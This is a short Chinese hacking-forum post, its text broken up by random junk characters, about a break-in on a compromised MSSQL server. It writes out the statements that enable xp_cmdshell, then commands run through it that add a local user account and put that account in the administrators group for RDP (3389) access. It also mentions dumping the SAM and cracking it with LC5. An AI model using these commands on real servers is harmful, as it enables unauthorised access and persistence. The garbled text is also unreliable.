saitojie

$ e" U% [0 J* R" h
* n8 b9 A' o6 c& `( o1 W* h

9 s3 X. @( A2 Y/ P  e7 ]- N  s" i
于是开始找开启语句，对mssql的玩的少，不是太熟悉！& y7 H- `( n6 T( B& v$ a# p( q7 D
后来二少给我了语句，便去继续日之
6 y4 [. Y* U0 W' mEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
7 a$ }+ h/ Q+ U" ^# I: p1为开启，0则为关闭！' F% G/ c( y/ v- ~: v9 W) c2 ]5 x
然后执行1 ]/ K% z6 A4 Y- Y" c4 _0 l, u, @1 ^
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c net user xx xx /add'6 G5 O% E9 }- i2 T# E: A" Q
即可9 Z4 ^' O: i5 E- t- i
回过头去看看，发现用户已经成功添加上了！
# G) J) E1 ~: e; q  }% a0 s- V, W

' r' r4 X0 b3 P5 j我就不明白BKK了，这个地方，你都已经加上用户了，为什么不直接加入到管理组里面，连接服务器的3389呢，为什么还要去下他的SAM，还用LC5去爆力破解呢！~~~~不明白！~~~
& g7 G3 H5 R. f: @2 @) c9 V  g# z# D$ WEXEC [master].[dbo].[xp_cmdshell] 'net localgroup administrators username /add'，难道是因为他的3389做了登陆用户的限制？